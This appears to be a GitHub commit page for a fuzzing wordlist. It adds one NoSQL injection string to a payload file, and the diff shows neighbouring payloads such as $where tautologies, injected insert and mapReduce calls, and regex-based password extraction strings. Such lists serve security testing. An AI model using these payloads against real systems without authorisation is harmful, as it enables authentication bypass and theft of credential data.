Skip to content

Commit

Permalink
Merge pull request danielmiessler#502 from danrneal/patch-1
Browse files Browse the repository at this point in the history
Add string js or injection
  • Loading branch information
g0tmi1k committed Sep 16, 2020
2 parents e3d31ed + 68fe48d commit 411cae8
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions Fuzzing/Databases/NoSQL.txt
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@ $where: '1 == 1'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' || 'a'=='a
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
Expand Down

0 comments on commit 411cae8

Please sign in to comment.